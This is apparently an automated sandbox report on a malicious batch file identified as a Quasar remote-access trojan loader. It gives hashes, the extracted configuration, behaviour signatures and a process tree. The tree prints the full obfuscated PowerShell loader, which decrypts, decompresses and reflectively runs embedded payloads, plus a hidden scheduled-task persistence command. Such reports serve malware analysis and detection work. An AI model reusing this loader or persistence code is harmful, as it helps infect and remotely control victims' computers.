Analysis
-
max time kernel
146s -
max time network
157s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-06-2024 21:41
Static task
static1
General
-
Target
$phantom-skull.bat
-
Size
586KB
-
MD5
3f4ece14276b9a3e1e10af1a2b1b8dfe
-
SHA1
a69c879a38c3aa8f45cd68721e92da4b2764a21b
-
SHA256
5e93bfa2d2fe95587cc4188f3cec20920ac1cf9c14940409c598f23147db1b8a
-
SHA512
e5b7542ee731c02b3aec132a769974f4e3f43496cfd538df76553695e06d24c0f1153cd76581a0a9874194adf2eca60c5bfb43ad6f57e12b96b60abf4f4f586a
-
SSDEEP
12288:ojDtCqD6/FY2qyiInQaRxp2Dgtmf3jk4pn+Zn9r+N4I85IS/j0FYd:o/hG/jqnINn2DgMjXn+ZN+/Nxed
Malware Config
Extracted
quasar
1.3.0.0
Office04
127.0.0.1:4782
QSR_MUTEX_6eCif6XcwfXry8UScl
-
encryption_key
5nBytPW7wGaoGTQFl19L
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4968-142-0x000002A9B0A70000-0x000002A9B0ACE000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 4968 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3252 powershell.exe 704 powershell.exe 4968 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 9 IoCs
Processes:
svchost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133620974041164439" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133620974650716589" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService svchost.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3252 powershell.exe 3252 powershell.exe 704 powershell.exe 704 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe 4968 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3320 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3252 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeIncreaseQuotaPrivilege 704 powershell.exe Token: SeSecurityPrivilege 704 powershell.exe Token: SeTakeOwnershipPrivilege 704 powershell.exe Token: SeLoadDriverPrivilege 704 powershell.exe Token: SeSystemProfilePrivilege 704 powershell.exe Token: SeSystemtimePrivilege 704 powershell.exe Token: SeProfSingleProcessPrivilege 704 powershell.exe Token: SeIncBasePriorityPrivilege 704 powershell.exe Token: SeCreatePagefilePrivilege 704 powershell.exe Token: SeBackupPrivilege 704 powershell.exe Token: SeRestorePrivilege 704 powershell.exe Token: SeShutdownPrivilege 704 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeSystemEnvironmentPrivilege 704 powershell.exe Token: SeRemoteShutdownPrivilege 704 powershell.exe Token: SeUndockPrivilege 704 powershell.exe Token: SeManageVolumePrivilege 704 powershell.exe Token: 33 704 powershell.exe Token: 34 704 powershell.exe Token: 35 704 powershell.exe Token: 36 704 powershell.exe Token: SeIncreaseQuotaPrivilege 704 powershell.exe Token: SeSecurityPrivilege 704 powershell.exe Token: SeTakeOwnershipPrivilege 704 powershell.exe Token: SeLoadDriverPrivilege 704 powershell.exe Token: SeSystemProfilePrivilege 704 powershell.exe Token: SeSystemtimePrivilege 704 powershell.exe Token: SeProfSingleProcessPrivilege 704 powershell.exe Token: SeIncBasePriorityPrivilege 704 powershell.exe Token: SeCreatePagefilePrivilege 704 powershell.exe Token: SeBackupPrivilege 704 powershell.exe Token: SeRestorePrivilege 704 powershell.exe Token: SeShutdownPrivilege 704 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeSystemEnvironmentPrivilege 704 powershell.exe Token: SeRemoteShutdownPrivilege 704 powershell.exe Token: SeUndockPrivilege 704 powershell.exe Token: SeManageVolumePrivilege 704 powershell.exe Token: 33 704 powershell.exe Token: 34 704 powershell.exe Token: 35 704 powershell.exe Token: 36 704 powershell.exe Token: SeIncreaseQuotaPrivilege 704 powershell.exe Token: SeSecurityPrivilege 704 powershell.exe Token: SeTakeOwnershipPrivilege 704 powershell.exe Token: SeLoadDriverPrivilege 704 powershell.exe Token: SeSystemProfilePrivilege 704 powershell.exe Token: SeSystemtimePrivilege 704 powershell.exe Token: SeProfSingleProcessPrivilege 704 powershell.exe Token: SeIncBasePriorityPrivilege 704 powershell.exe Token: SeCreatePagefilePrivilege 704 powershell.exe Token: SeBackupPrivilege 704 powershell.exe Token: SeRestorePrivilege 704 powershell.exe Token: SeShutdownPrivilege 704 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeSystemEnvironmentPrivilege 704 powershell.exe Token: SeRemoteShutdownPrivilege 704 powershell.exe Token: SeUndockPrivilege 704 powershell.exe Token: SeManageVolumePrivilege 704 powershell.exe Token: 33 704 powershell.exe Token: 34 704 powershell.exe Token: 35 704 powershell.exe -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4432 wrote to memory of 1152 4432 cmd.exe cmd.exe PID 4432 wrote to memory of 1152 4432 cmd.exe cmd.exe PID 4432 wrote to memory of 3252 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 3252 4432 cmd.exe powershell.exe PID 3252 wrote to memory of 704 3252 powershell.exe powershell.exe PID 3252 wrote to memory of 704 3252 powershell.exe powershell.exe PID 3252 wrote to memory of 4836 3252 powershell.exe WScript.exe PID 3252 wrote to memory of 4836 3252 powershell.exe WScript.exe PID 4836 wrote to memory of 1288 4836 WScript.exe cmd.exe PID 4836 wrote to memory of 1288 4836 WScript.exe cmd.exe PID 1288 wrote to memory of 2396 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 2396 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 4968 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 4968 1288 cmd.exe powershell.exe PID 4968 wrote to memory of 3320 4968 powershell.exe Explorer.EXE PID 4968 wrote to memory of 2164 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 980 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1568 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1164 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1556 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2724 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1736 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1340 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1020 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 3500 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2512 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1128 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1948 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 924 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1112 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1904 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 916 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2688 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1892 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2088 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 3464 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2476 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2672 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1292 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1680 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1476 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2460 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2452 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 4420 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1688 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1852 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 864 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2628 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 4408 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2032 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 5116 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1484 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1032 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2640 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1224 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1812 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1212 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 1992 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 2384 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 804 4968 powershell.exe svchost.exe PID 4968 wrote to memory of 3952 4968 powershell.exe svchost.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2476
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$phantom-skull.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tZl9+chFvFUMivNPwRvE1J//QYCwffyFtkUsPgq+ck='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AMw+lJFY+Lujvh0Sp7EJlQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TVPzB=New-Object System.IO.MemoryStream(,$param_var); $YCfwC=New-Object System.IO.MemoryStream; $ZJpOk=New-Object System.IO.Compression.GZipStream($TVPzB, [IO.Compression.CompressionMode]::Decompress); $ZJpOk.CopyTo($YCfwC); $ZJpOk.Dispose(); $TVPzB.Dispose(); $YCfwC.Dispose(); $YCfwC.ToArray();}function execute_function($param_var,$param2_var){ $AlGMz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $anIMO=$AlGMz.EntryPoint; $anIMO.Invoke($null, $param2_var);}$JaPUK = 'C:\Users\Admin\AppData\Local\Temp\$phantom-skull.bat';$host.UI.RawUI.WindowTitle = $JaPUK;$cbIiD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JaPUK).Split([Environment]::NewLine);foreach ($kSbQD in $cbIiD) { if ($kSbQD.StartsWith('JbAefUgjahVjAymduHEl')) { $BhOFY=$kSbQD.Substring(20); break; }}$payloads_var=[string[]]$BhOFY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_786_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tZl9+chFvFUMivNPwRvE1J//QYCwffyFtkUsPgq+ck='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AMw+lJFY+Lujvh0Sp7EJlQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TVPzB=New-Object System.IO.MemoryStream(,$param_var); $YCfwC=New-Object System.IO.MemoryStream; $ZJpOk=New-Object System.IO.Compression.GZipStream($TVPzB, [IO.Compression.CompressionMode]::Decompress); $ZJpOk.CopyTo($YCfwC); $ZJpOk.Dispose(); $TVPzB.Dispose(); $YCfwC.Dispose(); $YCfwC.ToArray();}function execute_function($param_var,$param2_var){ $AlGMz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $anIMO=$AlGMz.EntryPoint; $anIMO.Invoke($null, $param2_var);}$JaPUK = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.bat';$host.UI.RawUI.WindowTitle = $JaPUK;$cbIiD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JaPUK).Split([Environment]::NewLine);foreach ($kSbQD in $cbIiD) { if ($kSbQD.StartsWith('JbAefUgjahVjAymduHEl')) { $BhOFY=$kSbQD.Substring(20); break; }}$payloads_var=[string[]]$BhOFY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
586KB
MD53f4ece14276b9a3e1e10af1a2b1b8dfe
SHA1a69c879a38c3aa8f45cd68721e92da4b2764a21b
SHA2565e93bfa2d2fe95587cc4188f3cec20920ac1cf9c14940409c598f23147db1b8a
SHA512e5b7542ee731c02b3aec132a769974f4e3f43496cfd538df76553695e06d24c0f1153cd76581a0a9874194adf2eca60c5bfb43ad6f57e12b96b60abf4f4f586a
-
Filesize
124B
MD53aae4ea544cc2cd35aaa9054c0e90dfb
SHA1376f49daa1f20d18b0dc90680e479488991915f2
SHA25688c0b8dc771efe205028ad26228033911d375e4f1a37e32941791f83bc23ae00
SHA51244943534c5e403591f54272a6cd9379d1f440c14cc130c7441a21e6b1def3ae342fd9b532488494d02487a10612a8b01b222c1c3376c486a0aeb8b9a0880d2b2